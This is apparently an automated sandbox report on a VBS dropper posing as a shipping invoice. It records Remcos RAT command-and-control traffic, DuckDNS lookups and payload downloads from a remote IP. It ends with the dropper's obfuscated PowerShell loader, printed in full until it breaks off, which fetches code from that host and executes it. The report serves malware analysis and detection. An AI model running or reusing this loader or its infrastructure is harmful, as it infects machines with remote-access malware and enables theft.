Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: jawapharmaceuticals.com |
Virustotal: Detection: 6% |
Perma Link |
Source: awb_shipping_label_invoice_15_04_2024_000000000000024.vbs |
Virustotal: Detection: 8% |
Perma Link |
Source: |
Binary string: ws\System.Core.pdb7 source: powershell.exe, 0000000C.00000002.2614089673.00000000075D1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: tem.Core.pdb source: powershell.exe, 0000000C.00000002.2614089673.00000000075D1000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: Traffic |
Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.9:49712 -> 193.222.96.11:57484 |
Source: Traffic |
Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.11:57484 -> 192.168.2.9:49712 |
Source: unknown |
DNS query: name: iwarsut775laudrye2.duckdns.org |
Source: global traffic |
HTTP traffic detected: GET /strygetjs.thn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 94.156.79.64Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /ZtoOstiFBXtBvORCuTFplvl84.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 94.156.79.64Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 94.156.79.64 |
Source: global traffic |
HTTP traffic detected: GET /strygetjs.thn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 94.156.79.64Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /ZtoOstiFBXtBvORCuTFplvl84.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 94.156.79.64Cache-Control: no-cache |
Source: unknown |
DNS traffic detected: queries for: iwarsut775laudrye2.duckdns.org |
Source: powershell.exe, 00000008.00000002.2591690072.000001F70176B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591690072.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://193.222.96.149/strygetjs.thn |
Source: powershell.exe, 00000008.00000002.2591690072.000001F701BFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591690072.000001F700225000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://94.156.79.64 |
Source: powershell.exe, 00000008.00000002.2591690072.000001F70176B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2591690072.000001F700225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://94.156.79.64/strygetjs.thn |
Source: powershell.exe, 0000000C.00000002.2591487790.0000000003230000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: wscript.exe, 00000000.00000003.1302607608.0000024F707CF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1302607608.0000024F707CF000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/D |
Source: wscript.exe, 00000000.00000003.1303244235.0000024F70F20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1302964975.0000024F70EF8000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9b997501ca97f |
Source: wscript.exe, 00000000.00000003.1303109894.0000024F70ED4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1303027605.0000024F70EAC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9b997501ca |
Source: powershell.exe, 00000008.00000002.2636244693.000001F710069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2614089673.00000000075A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000008.00000002.2591690072.000001F700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2592757321.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2614089673.00000000075A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000008.00000002.2591690072.000001F700001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000C.00000002.2592757321.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000C.00000002.2592757321.0000000004BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2614089673.00000000075A5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000008.00000002.2591690072.000001F7011A6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000008.00000002.2636244693.000001F710069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2603501567.0000000005B02000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: amsi32_1792.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 968, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1792, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: awb_shipping_label_invoice_15_04_2024_000000000000024.vbs |
Static file information: Suspicious name |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 3966 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 3966 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 3966 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Krispin = 1;$Synsopfattelsen='Substrin';$Synsopfattelsen+='g';Function Macrometeorology($Vaults){$Subquestions=$Vaults.Length-$Krispin;For($Staaltraadsnettet=2; $Staaltraadsnettet -lt $Subquestions; $Staaltraadsnettet+=(3)){$Designless+=$Vaults.$Synsopfattelsen.Invoke($Staaltraadsnettet, $Krispin);}$Designless;}function Loggen($Darknesses){. ($Opisometer) ($Darknesses);}$Sniffles=Macrometeorology '.aMKooOvz.fiMilUnlbea v/.k5 M.Ps0B, De(.oWB.isanAtd KoGrwTrsTy CoNToT o Tr1Cu0Ta.,n0Fo; rW,ai LnBa6 D4 ,;Sh TexWo6 B4 ,;M, SurRuvPe:Vo1Se2Fi1 R.,u0No),e ,nGFeeKacRuk PoT / E2Ig0Ps1Ul0Fo0.m1R 0St1Op OF Hi OrZoeInf.noSex ,/Ab1.t2sa1Sp.,r0Pe ';$Rabiateste=Macrometeorology ' SUPhsSte Nr ,- nASvgN,emenA.tT. ';$awiggle=Macrometeorology ' nhL.tUat ,pKr:Re/Ki/ f9Ch4L,.F 1 5Mo6Ba.S,7S,9Ba.Wi6Un4un/EnsR tT.rSky Kg ,eS,tVejCos .KvtH,hAfn.i>Veh et FtUnp F:.e/Fa/Ko1b,9ba3Pu. 2Ri2Du2D .Ch9Hi6 L.O,1To4Ca9,e/L sHitMar.pyBrg CePrtAfj,asSo.TrtInh rnPr ';$Pteridophilism=Macrometeorology ' .>Mo ';$Opisometer=Macrometeorology 'aniL e .x.m ';$Fatningen = Macrometeorology 'IneT.c.hhVaoGe In%enaSppSkp.adSyaTatPraRe%Jo\unJRau Vn Gk GiH e RnMasC.. SPKar .oMo P.&Z &He Ope.ocInhPao l ,a$Se ';Loggen (Macrometeorology 'Bi$ GgO,lMao,ab ,aKul.e: dHIny BlBsa BsTimSlu ,sB =Re(Rec Um DdDo C./ acBr .$seFdvaPrtPunRoiPanStgcee LnH ) M ');Loggen (Macrometeorology 'An$ GgsklA,oAnb oa DlAm:Reb aPrcSmkUnf IiQulTals eRerEl=Ro$InaTawOri ,g CgMilReeDr.BlsdopN lDoiAptA,(Ca$AfPH,tDreKarI.iSpdProdvp ,hBei.plthiInsTrmF.) K ');$awiggle=$backfiller[0];Loggen (Macrometeorology 'S,$GagT,l SoDeb Fa.ul B: SKDuoStmYup seBon,asT,e BrS.eGlsFi=O N teElw F-A.O eb,aj.aeLacArtl cS ,yS,sF tSyeO mse.SqNGle,rtIn.EnW UeAnb .CSil iBrenon TtJu ');Loggen (Macrometeorology 'Ta$ UKT.o nmEipG.eInnDrsStePer,re .sF..MuHSye,ua PdD,eFerKrsLa[Ra$ NRAdaSqb Pibda ,tTreAtsHdtCre s]C.=Sa$ rSVenS iUdfR.fKvlFre HsSv ');$Kautionistens=Macrometeorology 'TeKFao FmBepFeefenKlsMieAsr Ces,si,.LeD oInwStnCel.eoMaabidH,F TiSylAneRe( F$ aWow,iiT.g rg,mlFoeRe,Fo$MeC.vr LoAcf .tPae.prC.iNosLue K) a ';$Kautionistens=$Hylasmus[1]+$Kautionistens;$Crofterise=$Hylasmus[0];Loggen (Macrometeorology ' S$RegK,lVeoEgb.uaHelT :EfsSwiRedDieB n.duD,mVim FeidrP,eA.tTesHa=S,(AlTTae,osRat .-.tPDea etSlh v Re$ .CStrBao PfAitAfeForChiIns.ie,a) ');while (!$sidenummerets) {Loggen (Ma |